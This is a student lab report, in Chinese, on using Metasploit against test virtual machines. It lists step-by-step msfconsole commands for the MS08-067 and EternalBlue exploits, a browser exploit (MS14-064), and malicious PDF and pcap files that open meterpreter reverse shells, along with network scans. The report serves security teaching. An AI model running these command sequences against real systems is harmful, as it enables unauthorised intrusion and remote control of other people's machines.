Exp5 MSF基础应用 20165110

一、实践要求（3.5分）

实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：

1.一个主动攻击实践;（1分）

ms08_067_netapi:自动化漏洞溢出攻击

payload:generic/shell_reverse_tcp(成功)

payload:windows/vncinject/reverse_tcp （失败）

ms17_010_eternalblue:“永恒之蓝”自动化攻击

payload:windows/x64/shell/bind_tcp(成功)

payload:generic/shell_reverse_tcp(失败)

2.一个针对浏览器的攻击；（1分）

ms14_064_ole_code_execution

payload:windows/vncinject/reverse_tcp(成功且唯一)

payload:payload/generic/shell_reverse_tcp(成功)

payload:windows/x64/meterpreter/reverse_http(失败)

ms10_042_helpctr_xss_cmd_exec(失败)

3.一个针对客户端的攻击（1分）

Adobe(失败)

Wireshark:

payload:set payload windows/meterpreter/reverse_tcp        (成功)

4.成功应用任何一个辅助模块。（0.5分）

在实现ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口（成功）

在实现ms17_010中应用use auxiliary/scanner/smb/smb_ms17_010扫描存在该漏洞的靶机（成功且唯一）

以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除0.5分。

二、实验内容

Kali 的IP：10.1.1.211

首先是血与泪的教训（整了我足足三天）

！！注意：一定要在做实验之前把虚拟机的网卡设置为桥接模式，再通过设置虚拟网络编辑器，选择物理网卡，使得多台虚拟机处于同意网段中，否则之间根本就ping不通，攻击也无从谈起。

实验一：ms08_067_netapi

靶机：Microsoft Windows 2000（10.1.1.107）

1.首先使用kali进行漏洞扫描

nmap -sS -A --script=smb-vuln-ms08-067 -PO 10.1.1.211

vuln: 负责检查目标机是否有常见的漏洞（Vulnerability）

–script=: 使用某个或某类脚本进行扫描，支持通配符描述

首先必须要说的是nmap能扫描的漏洞并不多，有时扫描一些漏洞会出现如下所示的情况，表示该漏洞没有在nmap扫描库中不可以被扫描。

但是此处的ms08_067非常凑巧的可以被扫描，扫描结果如下图

在kali端进入msfconsole控制台

首先查找ms08_067漏洞的具体位置

search ms08_067

然后进行漏洞选择

use exploit/windows/smb/ms08_067_netapi

通过show options

查看配置信息

使用辅助模块查看默认端口（445）是否开放

search portscan # 搜索端口

use auxiliary/scanner/portscan/tcp # 使用漏洞

show options  #显示设置

set RHOSTS 10.1.1.211  # 设置监听者地址

exploit # 攻击

返回ms08_967设置靶机类型

set target 1

查看可用的payloads

show payloads

set payload windows/x64/shell/bind_tcp//选择payload

再次查看相关配置信息

set LHOST 10.1.1.211

set LPORT 5111//注：此处因为我的学号5110始终被占用无法使用，故将端口更换成5111

exploit

攻击成功！！！

更换另一个payload：windows/vncinject/reverse_tcp

查找了一些关于这个payload的相关资料

Windows/vncinject/bind_tcp 在目标计算机上安装VNC并等待连接

期间它总是报出这样的错误

我针对这个错误做了这样的尝试：

就是不停地更换端口，后来也请教了一些大佬，说是因为上次的使用没有正常退出导致源端口被占用，无法继续执行下面的任务，

还有一种解决方案是关掉终端重新启动msfconsole，两种方法经过实践是都可以解决这个问题的

但是就我个人而言，我认为这个错误很奇怪啊，我每次在使用完成之后都会进行退出啊，为啥只要一退出再进入都会出现这样的端口占用问题呢，可能是我退出的方式不对吧。。。

好了言归正传回来，继续使用这个payload，设置好参数，然后exploit，

然后嗯等了好久好久，然后出现了一大堆false，我研究了半天也没搞明白这些false是什么原因，然后我又跑去换了sp2，xp，2007的靶机都以失败告终，这个payload攻击宣告失败。。。

实验二：ms17_010_eternalblue:“永恒之蓝”自动化攻击

在这个攻击该漏洞之前我利用了辅助工具auxiliary/scanner/smb/smb_ms17_010 这个扫描插件进行测试，该插件的作用是扫描本网段钟可能含有ms17-010漏洞的服务器，帮助我们寻找靶机

首先进入这个辅助工具的界面中

use auxiliary/scanner/smb/smb_ms17_010

随后通过指令show options

来查找该工具所需要的参数，我们可以看到RHOSTS和RPORT两个参数是必需的。

RPORT：在上一个漏洞中我们已经扫描了445端口是开放的，所以这里的RPORT不再修改直接使用即可。

RHOSTS：通过查找我们宿舍的网段网关地址为10.1.1.1,子网掩码是255.255.255.0,故目标网段应该填写为10.1.1.1/24将一些必备的参数填写进去，最后输入run或者exploit执行辅助工具。

经过一段时间的等待，我们可以发现扫描结果，本网段中有一台符合条件的主机，嘿嘿嘿，就是我的win7虚拟机啦，然后就可以愉快地开始攻击了呢。

首先老规矩输入下列一大串指令

search ms17_010 #搜索漏洞

use exploit/windows/smb/ms17_010_eternalblue    #使用漏洞

show payloads   #显示可用攻击载荷

set payload payload/generic/shell_reverse_tcp  #选择攻击载荷

show options #查看配置信息

set LHOST 10.1.1.211 #设置监听地址

set RHOSTS 10.1.1.1/24(这里也可以写具体的主机地址) #设置靶机地址

exploit #开始攻击

注：由于我在做这个实验的时候崩了好几次虚拟机，所以我又重新拷了好几次虚拟机，所以实验中的RHOSTS在不停发生变化。。。

嘻嘻，攻击成功！！！

然后非常有冒险探索精神的我决定回一个payload``````payload:generic/shell_reverse_tcp`````

喵喵喵，失败了？？？

失败原因是好多好多个false，一开始是疑心我的参数设置的有问题，但是重新做了好几遍都不成功，我再折回去看靶机，一看哟蓝屏了，已经ping不通了，这个靶机成功又被我整die了，微笑.jpg。

我又参考了某猪的博客唔，觉得这个漏洞还是非常容易被攻击的，只要是相应的payloads基本都是可以成功的，至于去哪里找相应的paylos，有一个指令叫做info该指令可以朝朝到该漏洞的相关信息，有的describe里面会包含对应的payloads。

实验三：ms14_064_ole_code_execution（针对浏览器的攻击）

还是老规矩上代码：

search ms14_064//查找漏洞所在位置

use exploit/windows/browser/ms14_064_ole_code_execution//选择攻击模块

show payloads //显示可用攻击载荷

set payload windows/vncinject/reverse_tcp //在目标计算机上安装VNC并设置tcp反向连接

info //查看详细信息（发现可攻击winXP和win7）

set SRVHOST 10.1.1.211 //设置攻方IP

set LHOST 10.1.1.211

set LPORT 5111

set target 0 //设置winXP靶机

exploit //发起渗透攻击

生成一个URL地址，用WinXP的IE8.0打开，可以发现成功建立会话，

并且还会弹出VNC弹框，弹框中的内容是靶机的屏幕，实现了监控，

wow it‘s very cool。

我还尝试了一个常规payload:payload/generic/reverse_tcp



嘻嘻，同样也成功了。

我继续进行探索，payload:windows/x64/meterpreter/shell_reverse_https等诸多https的payload

很不幸，它们都失败了，所以我做出了大胆的假设，可能是因为我的两台机器之间并没有建立https通信方式。。。

附录：ms10_042_helpctr_xss_cmd_exec(对浏览器的攻击，失败)

实验四：对一个客户端进行攻击

Adobe

这个可真是难为我小猪佩奇了，我通过search adobe搜索了相关的漏洞最后选择了攻击成功率最高的攻击模块

windows/fileformat/adobe_cooltype_sing

靶机：WinXP

老规矩上代码

set payload

windows/meterpreter/reverse_tcp //设置tcp反向连接

set LHOST 10.1.1.211 //kali IP

set LPORT 5111 //设置攻击端口

set FILENAME 5110.pdf //设置生成的pdf文件名

exploit //发起攻击

成功在目录root/.msf4/local中生成5110.pdf，将该文件直接拖至靶机中

返回kali端进入监听模块：

use exploit/multi/handler //进入监听模块

exploit //监听

回到WinXP中双击打开pdf文件，然后不幸的事情发生了，

Adobe Reader开启失败，报错了，然后我尝试进行修复，然后依然没有办法打开pdf文件

我一开始怀疑是我生成的pdf文件有问题，导致Adobe Reader崩了，然后我在自己的主机上打开这个pdf，唔发现打开正常啊，里面的内容Hello World!说明pdf没问题啊，唔，那么悲惨的事实摆在了我的面前，那就是我的Adobe崩了。。。于是乎，我又跑去下载了其他的Adobe

然后嗯到现在也没有下载下来，等下载下来了我再进行尝试，

我还会再回来的==

Wireshark

这个也是为难我小猪佩奇的一个利器啊，不过这也只能怪我画蛇添足，自做聪明了。。。

靶机：WinXP

话不多说，上代码

 use exploit/windows/fileformat/wireshark_packet_dect.rb  //使用漏洞

 set payload windows/meterpreter/reverse_tcp //选择载荷

 set LHOST 10.1.1.211 //攻击者地址

 exploit

生成一个passwords.pcap捕包文件，将该文件拖至靶机中

进入监听模块

use exploit/multi/handler #进入监听模块

exploit #攻击

在靶机中打开passwords.pcap文件

攻击成功

中间出现了一个错误，就是我以为靶机中没有wireshark，我自己从网上下载了一个wireshark，这个wireshark是32位的版本比较老，所以使用它打开生成passwors.pacp文件显示的是错误，我在网上查找了出现这个错误的原因，因为Wireshark的版本中支持的数据量很小，生成的该pacp文件中的数据量已经超过了Wireshark一次所能读取的量，所以无法打开，我重装了虚拟机之后，使用其自带的wireshark即可成功实现该攻击。

三、实验中的遇到的问题

1.首先是我的kali与其他虚拟机不在一个网段上，根本无法进行ping通，直接导致了之前我所有的攻击都失败了。。。

2.攻击ms08-067时，我一开始使用的WinXP，但是一直都没有攻击成功，后来我通过参考某猪的博客，原来我的WinXP系统是中文版，里面已经装了相关的漏洞，所以当然攻击不成功了，微笑.jpg。

3.进行攻击时经常出现如下的状况

基本上换一下端口就可以解决，所以我实验中的截图的端口号从5109-5113都试过了。。。实在不行的话，那就重启msf吧

4.进行Wireshark攻击时，出现了一个错误，就是我以为靶机中没有wireshark，我自己从网上下载了一个wireshark，这个wireshark是32位的版本比较老，所以使用它打开生成passwors.pacp文件显示的是错误，我在网上查找了出现这个错误的原因，因为Wireshark的版本中支持的数据量很小，生成的该pacp文件中的数据量已经超过了Wireshark一次所能读取的量，所以无法打开，我重装了虚拟机之后，使用其自带的wireshark即可成功实现该攻击。



5.实验过程中还出现这样的问题



解决方案：加上set payload...

四、基础问题回答

1.用自己的话解释什么是exploit,payload,encode.

答：

exploit：应该是攻击模块，里面包含攻击的平台、攻击使用的工具、以及攻击所需要的参数，应该是一个集所有工具于一体的攻击模块。

payload：实际用于攻击的代码、机器指令

encode：对payload进行编码的编码器

2.实践总结与体会

答：这个我从上周二基本就开始做了，一直做到今天还有一些地方需要完善，整个电脑的风扇一直在响，最多的一次我一下子开了四台虚拟机，我看着我的CPU爆红，这是我有电脑以来，第一次出现这种情况，总结一句话，这个实验给我的感觉是道路是曲折的，前途是光明的，失败了九十九次，不要气馁，因为第一百次还会失败的，smile。

这个实验还是给了我一些经验，比如说排除问题，查找问题的能力，以及愈挫愈勇的能力。。。。

3.离实战还缺些什么技术或步骤？

答：我一直都好好奇，为啥每次实验都有这个问题。。。但是我还是要认真回答以下这个问题，我觉得我们离实战最缺少的步骤就是实践，所有的技术或者步骤都是具体问题具体分析，正如卖油翁中的一句话“唯手熟尔”。